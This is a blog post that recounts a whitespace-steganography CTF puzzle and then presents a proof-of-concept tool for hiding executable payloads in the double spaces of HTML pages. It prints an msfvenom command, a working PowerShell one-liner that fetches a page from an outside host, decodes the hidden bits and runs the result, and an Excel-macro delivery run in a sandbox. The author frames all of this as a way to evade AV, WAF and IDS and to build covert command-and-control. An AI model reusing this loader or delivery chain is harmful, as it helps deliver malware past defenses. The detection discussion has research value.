HTML Whitespace Steganography & Binary Exploit Delivery w/Powershell over HTML [PoC]

Published in

The Startup

9 min read · Jun 11, 2020

The quieter you become…the quieter you become

Practical Steganography

A few years ago I came across a rather academic challenge: a ZIP file containing a single, peculiar HTML page. The aim, as usual, was to obtain the FLAG.

The web page didn’t have any “juicy clue”, script, image or anything else. The only strange things were its size (a few MB) and the fact that the whole source sat on a single line.

What made me suspicious was the content: an extract from a Wikipedia page, repeated many times over. I looked for differences between one repetition and the next, but nothing was visible from a browser, so I checked the source directly. There I found that, up to a certain point, no two repetitions were identical in the source; from that point on, the code repeated itself exactly.

Analyzing the differences in the HTML source, the only thing that emerged was a set of double spaces between words, arranged in an apparently random way.

I no longer remember how I got there, but searching the Internet I found some papers by undergraduates (Indian, I think) that illustrated the theory behind “inter-word” whitespace steganography (something like SNOW, plus an interesting vector). Applying their ideas in my own custom scripts, I managed to recover the binary files hidden in the duplicated spaces on the page.

The files were images, which contained other images, compressed files, their passwords and finally the FLAG hidden in a digital audio file. And that was the challenge and the end of it.

The Concept

As you can see, I mentioned SNOW (which “exploits the Steganographic Nature Of Whitespace”).

SNOW appends whitespace (spaces and tabs) to the end of each line of an ASCII file, encoding binary data that can optionally be compressed and encrypted. The advantage, and at the same time the limitation, of this approach is that capacity scales with the number of lines available: the more lines, the more data can be hidden. The real disadvantage is that any text editor can highlight suspicious trailing spaces and tabs, and the information can be lost if the file is processed by a parser that strips them.

Inter-word whitespace steganography, applied to web pages, lets us insert any kind of binary data between one word and the next. The result is invisible in a browser and hard to spot even when reading the source: if you don’t know it’s there you will hardly notice it, because an extra space between two tags or words does not look suspicious.

The other advantage is that there is no data loss: both static and dynamic HTML pages are transmitted to the client as they are, and their interpretation is left entirely to the browser.

Of course there are limitations: the amount of data you can embed is bounded by the length of the “container” page. However, the data can be compressed, and you don’t need much capacity if your payload is a set of commands or a small binary rather than bulk information.
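As a rough illustration of this capacity trade-off, the sketch below counts the usable gaps in a container page and compares them with the bits needed by a raw and a zlib-compressed payload. It assumes one bit per space, as in the scheme described in this article; `capacity_report` and its field names are hypothetical and are not taken from html-ninja.py.

```python
import zlib


def capacity_report(carrier: str, payload: bytes) -> dict:
    """Compare the gaps available in the carrier with the bits a payload needs."""
    # Assumption: every single space in the carrier can hold exactly one bit.
    available_bits = carrier.count(" ")
    raw_bits = len(payload) * 8
    compressed_bits = len(zlib.compress(payload, 9)) * 8
    return {
        "available_bits": available_bits,
        "raw_bits": raw_bits,
        "compressed_bits": compressed_bits,
        "fits_raw": raw_bits <= available_bits,
        "fits_compressed": compressed_bits <= available_bits,
    }


if __name__ == "__main__":
    # Made-up container page and payload, only to show the report.
    page = "<p>" + "lorem ipsum dolor sit amet " * 200 + "</p>"
    data = b"hello world " * 40
    for key, value in capacity_report(page, data).items():
        print(f"{key}: {value}")
```

With a highly repetitive payload like the one in the demo, compression makes the difference between fitting and not fitting; already-compressed or encrypted data would gain little.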

How does it work

Long story short: alternating single and double spaces using a sort of Manchester encoding.

So:

one space == 0
two spaces == 1

This is possible because, with the default whitespace handling, a browser collapses consecutive spaces and always renders them as a single one, while extra spaces inside tags are invisible to the reader.

The file “pippo.html”:

<b>Pippo</b> (<i>Goofy</i>, in precedenza <i>Dippy Dawg</i> e <i>Dippy the Goof</i><sup id="cite_ref-:0_1-0" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>) è un <a href="/wiki/Personaggio_immaginario" title="Personaggio immaginario">personaggio immaginario</a> dei <a href="/wiki/Cartone_animato" title="Cartone animato">cartoni animati</a> e dei <a href="/wiki/Fumetti" class="mw-redirect" title="Fumetti">fumetti</a> della <a href="/wiki/Disney" class="mw-redirect" title="Disney">Disney</a>, ideato nel 1932 da <a href="/wiki/Pinto_Colvig" title="Pinto Colvig">Pinto Colvig</a> e dall’animatore Johnny Cannon come comprimario di <a href="/wiki/Topolino" title="Topolino">Topolino</a> in un <a href="/wiki/Cortometraggio" title="Cortometraggio">cortometraggio</a>, ma viene caratterizzato definitivamente dall’animatore <a href="/wiki/Art_Babbitt" title="Art Babbitt">Art Babbitt</a> nel 1935<sup id="cite_ref-:0_1-1" class="reference"><a href="#cite_note-:0-1">[1]</a></sup> e successivamente esordisce nei fumetti realizzati da <a href="/wiki/Floyd_Gottfredson" title="Floyd Gottfredson">Floyd Gottfredson</a> che definisce ulteriormente il personaggio dandogli spessore come spalla di Topolino<sup id="cite_ref-:0_1-2" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>. È apparso in centinaia di cartoni animati come protagonista o comprimario<sup id="cite_ref-:2_2-0" class="reference"><a href="#cite_note-:2-2">[2]</a></sup> e in migliaia di albi a fumetti realizzati in vari paesi del mondo<sup id="cite_ref-3" class="reference"><a href="#cite_note-3">[3]</a></sup>.

…is exactly the same (has the same output) as “pipponinja.html”:

<b>Pippo</b> (<i>Goofy</i>,  in  precedenza  <i>Dippy Dawg</i> e <i>Dippy the Goof</i><sup  id="cite_ref-:0_1-0"  class="reference"><a href="#cite_note-:0-1">[1]</a></sup>)  è un <a  href="/wiki/Personaggio_immaginario" title="Personaggio  immaginario">personaggio  immaginario</a>  dei <a href="/wiki/Cartone_animato" title="Cartone animato">cartoni animati</a>  e  dei  <a href="/wiki/Fumetti" class="mw-redirect" title="Fumetti">fumetti</a> della <a  href="/wiki/Disney"  class="mw-redirect" title="Disney">Disney</a>,  ideato  nel  1932  da <a href="/wiki/Pinto_Colvig" title="Pinto Colvig">Pinto  Colvig</a> e  dall’animatore Johnny Cannon come comprimario di <a href="/wiki/Topolino" title="Topolino">Topolino</a> in un <a href="/wiki/Cortometraggio" title="Cortometraggio">cortometraggio</a>, ma viene caratterizzato definitivamente dall’animatore <a href="/wiki/Art_Babbitt" title="Art Babbitt">Art Babbitt</a> nel 1935<sup id="cite_ref-:0_1-1" class="reference"><a href="#cite_note-:0-1">[1]</a></sup> e successivamente esordisce nei fumetti realizzati da <a href="/wiki/Floyd_Gottfredson" title="Floyd Gottfredson">Floyd Gottfredson</a> che definisce ulteriormente il personaggio dandogli spessore come spalla di Topolino<sup id="cite_ref-:0_1-2" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>. È apparso in centinaia di cartoni animati come protagonista o comprimario<sup id="cite_ref-:2_2-0" class="reference"><a href="#cite_note-:2-2">[2]</a></sup> e in migliaia di albi a fumetti realizzati in vari paesi del mondo<sup id="cite_ref-3" class="reference"><a href="#cite_note-3">[3]</a></sup>.
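The one-space/two-space mapping described above can be sketched in Python as follows. This is a minimal illustration and not the html-ninja.py implementation: the function names `embed` and `extract` are hypothetical, and the sketch assumes the carrier contains no double spaces of its own.

```python
import re


def bytes_to_bits(data: bytes) -> str:
    """Render bytes as a string of '0'/'1' characters, MSB first."""
    return "".join(f"{byte:08b}" for byte in data)


def bits_to_bytes(bits: str) -> bytes:
    """Pack a bit string back into bytes, dropping an incomplete last byte."""
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def embed(carrier: str, payload: bytes) -> str:
    """Hide payload bits in the gaps: one space == 0, two spaces == 1."""
    if "  " in carrier:
        raise ValueError("carrier already contains double spaces")
    bits = bytes_to_bits(payload)
    if len(bits) > carrier.count(" "):
        raise ValueError("carrier has too few spaces for this payload")
    out, pos = [], 0
    for ch in carrier:
        if ch == " " and pos < len(bits):
            out.append("  " if bits[pos] == "1" else " ")
            pos += 1
        else:
            out.append(ch)  # non-space, or a gap left over after the payload
    return "".join(out)


def extract(stego: str) -> bytes:
    """Read every gap back as a bit; unused gaps decode as trailing zeros."""
    gaps = re.findall(r" {1,2}", stego)
    bits = "".join("1" if len(gap) == 2 else "0" for gap in gaps)
    return bits_to_bytes(bits)


if __name__ == "__main__":
    carrier = " ".join("abcdefghijklmnopqrstuvwxy")  # 24 gaps
    stego = embed(carrier, b"Hi")
    print(repr(stego))
    print(extract(stego))
```

Note that the gaps left over after the payload still decode as zero bits, so a decoder needs a terminator or a length field to know where the real data ends.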

In practice

After banging my head trying to decode that cursed file, I thought of writing a POC to do the reverse operation and try to “weaponize” a possible payload.

Why do I say “weaponize”? Because I challenge any proxy / WAF / AV to analyze every single space in every page sent in the clear over a legit HTTP(S) port, looking for a payload that may also be compressed or password-protected.

[actually it’s just extremely fun to put an MSF payload into an HTML file and make it “executable”]

This is how HTML-Ninja was born, for lack of better acronyms.

The tool, raw and incomplete, is a POC written mainly in Python (with JavaScript and VBA variants) that lets you insert, extract and execute payloads within HTML files. Other features have been added in the meantime, but it is still a free-time project which has not had much feedback.

Help excerpt:

html-ninja.py -e source content outfile -> will encode the payload file 'content' into file 'source' and output the result as 'outfile'
html-ninja.py -d source outfile -> will try to decrypt white spaces in 'source' file into 'outfile'
html-ninja.py --check filename -> will check 'filename' for available spaces and spaces needed to embed the file
html-ninja.py -d http://localhost/html-ninja.html stdout -> will get http url and output to stdout
html-ninja.py -d http://localhost/html-ninja.html exec -> will get http url and execute the hex payload (payload must have a '|' terminator)
html-ninja.py -ez / -dz ... -> adds zlib compression to both encryption and decryption
html-ninja.py -eb / -db ... -> adds bz2 compression to both encryption and decryption
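One practical detail of combining compression with this encoding: the gaps left unused after the payload decode as zero bits, so the recovered byte string ends with padding. The sketch below shows one way to cope with that in Python, using `zlib.decompressobj()`, which stops at the end of the compressed stream and leaves any trailing bytes in `unused_data`. The function name `unpack_padded` is hypothetical, and this is not necessarily how html-ninja.py handles it.

```python
import zlib


def unpack_padded(recovered: bytes) -> bytes:
    """Decompress a zlib stream that may be followed by padding bytes."""
    decompressor = zlib.decompressobj()
    payload = decompressor.decompress(recovered)
    if not decompressor.eof:
        # The stream ended before zlib saw its end-of-stream marker.
        raise ValueError("compressed stream is truncated")
    # Whatever followed the stream (the padding) is in decompressor.unused_data.
    return payload


if __name__ == "__main__":
    original = b"example payload " * 10
    # Simulate what a decoder would recover: the stream plus zero padding.
    recovered = zlib.compress(original) + b"\x00" * 7
    print(unpack_padded(recovered) == original)
```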

Examples on github include:

html-ninja.js & html-ninja.html

JavaScript version and sample HTML showing a “self-decryption” page.

macro_poc.bas & htm

VBA version for automatic execution of payloads via Excel.

buf.txt

Example of an MSF payload:

msfvenom -p linux/x64/exec CMD="whoami;id;uname -a" -f python -o buf.txt

…and a few others…

Demonstration

Let’s take our buf.txt payload and hide it with zlib compression in pippo.html

Now let’s “read” the content of pipporun.html

Binary Exploit Delivery w/Powershell over HTML [PoC]

Static HTML file gets downloaded -> HTML hides binary data -> HTML gets “executed”

Harmless static HTML page with embedded binary payload: https://ephreet.github.io/html-ninja/

It could embed an msfvenom Meterpreter payload or any other file, but for the sake of the PoC we are going with the usual “calc.exe”.

Proof of Concept run (payload = “iex calc.exe”):

$CnC = "https://ephreet.github.io/html-ninja/"; $pch = "nil"; $b = ""; $ch = ""
foreach ($cu in (Invoke-WebRequest $CnC -UserAgent "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0").ToString().tocharArray()) {$ch = $cu;if ($pch -eq " "){if ($ch -eq " "){$b = $b + "1"; $ch = "nil"}else{$b = $b + "0";$ch = "nil"}};$pch = $ch}$c = ""
($b -split '(\w{8})' | ? {$_}) | ForEach-Object {$c = $c + [convert]::Tochar([System.Convert]::ToByte($_,2))};$p = $c.Split(" "); & $p[0] $p[1]

Source: https://github.com/ephreet/html-ninja/

SANDBOX [ANY.RUN]

Let’s see what a sandbox makes of the payload when it is delivered through an Excel macro.

Used sandbox: any.run

Payload: cmd.exe

The Excel file contains an on-load macro that requests the page over HTTP, decodes the payload with the algorithm above and executes it. I expect the abnormal behavior of the script and the download to be detected; this is only a simulation that imagines an already running service.

The Excel file is opened and the payload is executed, so it works. Obviously the sandbox realizes that something is wrong, because the file has contacted a website and a command has been executed.

Analyzing the HTTP request we can only see harmless HTML source:

In this example the page is also saved locally, even though that isn’t required; it doesn’t raise any big alarms, however:

Let’s check on VirusTotal anyway:

These are the suspicious indicators: it is clearly unusual for Excel to make HTTP requests, but there is no alarm from IPS or IDS:

To be clear, there would normally be some evidence like this, in the form of matching Suricata rules:

Okay, the sandbox notices (of course) and the URL is quite obvious. Even a static analysis of the sample would have allowed us to trace the behavior.

But what if, instead of delivering the payload this way, I installed a service? What if it were a browser plugin? In short, if I could avoid the sandbox and the connections went to http://random.foo/info.htm (invented!), could one rely only on the reputation of a domain?

Conclusions

Okay, it’s a POC. Yes, a payload must still be delivered before it can be executed. And yes, a sandbox will still notice what is being done.

But let’s imagine a more targeted version, perhaps with an offset from which to start reading the steganographic part of an HTML page, and a service running on your PC that makes web requests to seemingly harmless pages that we control.

Wouldn’t that be a Command and Control hidden in plain sight? After the sandbox, would an IPS / IDS be able to intercept it?
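As a partial answer to that question, here is a minimal sketch of what a detection heuristic could look like. It relies on one assumption: an ordinary page has very few double spaces between words, while a page carrying compressed or random-looking data in this encoding has roughly as many double gaps as single ones. The function name `gap_profile` and the thresholds (`min_gaps=64`, `max_double_ratio=0.2`) are invented for illustration and have not been validated against real traffic.

```python
import re


def gap_profile(html: str, min_gaps: int = 64, max_double_ratio: float = 0.2) -> dict:
    """Count single vs double spaces between non-space characters."""
    # Only runs of spaces enclosed by non-whitespace are considered, so
    # indentation at the start of a line is not counted.
    runs = [len(run) for run in re.findall(r"(?<=\S) +(?=\S)", html)]
    singles = sum(1 for n in runs if n == 1)
    doubles = sum(1 for n in runs if n == 2)
    total = singles + doubles
    ratio = doubles / total if total else 0.0
    return {
        "singles": singles,
        "doubles": doubles,
        "double_ratio": ratio,
        # Hypothetical rule: enough gaps to matter, and too many double ones.
        "suspicious": total >= min_gaps and ratio >= max_double_ratio,
    }


if __name__ == "__main__":
    clean = "word " * 100 + "end"
    stego_like = "a  b c  d " * 50 + "e"
    print(gap_profile(clean))
    print(gap_profile(stego_like))
```

A check like this is easy to evade, for example by embedding only a few bits per page, so it is a starting point for discussion rather than a real defense.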

Meanwhile, I certainly had a lot of fun opening a reverse shell by “running” an HTML file.